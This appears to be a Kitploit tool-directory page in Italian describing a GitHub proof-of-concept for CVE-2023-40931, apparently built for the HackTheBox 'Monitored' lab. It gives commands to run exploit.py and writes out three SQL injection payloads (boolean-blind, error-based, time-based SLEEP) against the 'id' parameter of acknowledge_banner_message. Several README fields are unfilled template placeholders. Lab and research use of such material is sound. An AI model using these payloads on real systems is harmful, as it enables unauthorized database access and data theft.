Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-40931-POC — Prova di concetto per CVE-2023-40931 realizzata per HTB MONITORED | Kitploit
Strumenti/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

Prova di concetto per CVE-2023-40931 realizzata per HTB MONITORED

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-40931 Prova di concetto (PoC) 🚨

Questo repository contiene una Prova di concetto (PoC) per CVE-2023-40931, una vulnerabilità di sicurezza identificata in [software/sistema interessato]. Lo scopo di questo repository è dimostrare la vulnerabilità solo a fini educativi e di ricerca. 🛠️

Disclaimer ⚠️

Questo progetto è destinato esclusivamente a scopi educativi e test autorizzati. L'uso improprio di questo codice può comportare conseguenze legali. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo codice. Ottenere sempre la debita autorizzazione prima di testare qualsiasi sistema. 🔒

Dettagli 📋

  • ID CVE: CVE-2023-40931
  • Tipo di vulnerabilità: [Tipo di vulnerabilità, ad es. Esecuzione di codice in remoto, Escalation dei privilegi]
  • Software interessato: [Nome e versione del software interessato]
  • Gravità: [Livello di gravità, ad es. Critica, Alta] 🚩

Per maggiori informazioni, fare riferimento alla voce CVE ufficiale: CVE-2023-40931. 🔗

Utilizzo 🚀

  1. Clonare il repository:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    Il parametro POST 'id' è vulnerabile. I seguenti payload hanno sfruttato con successo la vulnerabilità:

    • Boolean-based blind: Questo payload utilizza un'istruzione condizionale per determinare il valore di verità di una query, consentendo l'estrazione di dati tramite logica booleana.

      • Payload: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • Error-based: Questo payload sfrutta i messaggi di errore del database per estrarre informazioni attivando errori specifici.

      • Payload: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • Time-based blind: Questo payload utilizza ritardi temporali per dedurre informazioni osservando il tempo di risposta del server.

      • Payload: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    Questi payload dimostrano la suscettibilità della vulnerabilità agli attacchi SQL injection. Procedere con cautela e assicurarsi di avere la debita autorizzazione prima di testare. 🔒

  2. Seguire le istruzioni nel file exploit.py per eseguire la PoC. 🧑‍💻

    Nota: Assicurarsi di avere installate le dipendenze richieste. ✅

Scarica lo strumento